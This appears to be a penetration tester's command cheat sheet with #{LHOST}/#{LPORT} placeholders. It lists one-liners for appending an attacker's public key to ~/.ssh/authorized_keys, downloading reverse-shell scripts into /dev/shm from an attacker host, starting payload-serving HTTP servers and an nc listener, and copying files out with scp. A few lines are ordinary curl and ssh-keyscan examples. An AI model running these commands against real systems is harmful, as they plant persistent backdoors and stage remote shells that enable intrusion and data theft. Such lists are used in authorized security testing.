# Add public key to authorized keys
# desc: Add SSH
curl https://#{LHOST}:#{LPORT}/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

# desc: Download in RAM
wget #{LHOST}:#{LPORT}/#{file} -O /dev/shm/.rev.py
wget #{LHOST}:#{LPORT}/#{file} -P /dev/shm
curl #{LHOST}:#{LPORT}/#{file} -o /dev/shm/shell.py
@file.desc(backconnect file)

# desc: HTTP servers
python -m SimpleHTTPServer #{LPORT}

# desc: HTTP servers
python3 -m http.server #{LPORT}

# desc: HTTP servers
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => #{LPORT}, :DocumentRoot => Dir.pwd).start"

# desc: HTTP servers
php -S $ip:#{LPORT}

# desc: NC TCP Listening
nc -nvlp #{LPORT}

# desc: Curl POST
# json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3001/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

# desc: Send Email
# You will be prompted for the content
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf 

# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101

# desc: Secure Copy to Remote
# refer: https://wangdoc.com/ssh/scp.html
scp #{source_file} #{user}@#{RHOST}:#{remote_path}